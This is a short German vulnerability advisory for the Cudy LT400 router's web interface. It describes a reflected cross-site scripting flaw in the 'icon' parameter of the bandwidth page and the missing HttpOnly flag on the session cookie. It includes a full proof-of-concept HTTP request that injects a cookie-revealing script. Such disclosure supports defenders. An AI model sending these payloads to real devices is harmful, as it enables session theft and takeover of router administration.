
Proof-of-Concept für reflektiertes XSS in der Cudy-LT400-Weboberfläche, das den Diebstahl von Sitzungscookies und die Übernahme der Admin-Kontrolle über manipulierte Anfragen demonstriert.
Im webbasierten Management-Interface des Cudy LT400 existiert eine reflektierte Cross-Site-Scripting (XSS)-Angriffsmöglichkeit.
Die Seite /cgi-bin/luci/admin/network/bandwidth weist eine reflektierte XSS über den Parameter icon auf.
Die Ausnutzungsmethoden beinhalten das Senden einer speziell präparierten Anfrage an das Opfer, die bösartigen Code enthält.
Die betroffene Anwendung setzt das Session-Cookie nicht mit dem HttpOnly-Attribut; dies kann zur Übernahme des Administrators durch Diebstahl des Session-Tokens führen.
GET /cgi-bin/luci/admin/network/bandwidth?iface=4g&icon=icon-4g%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&i18name=Cellular HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology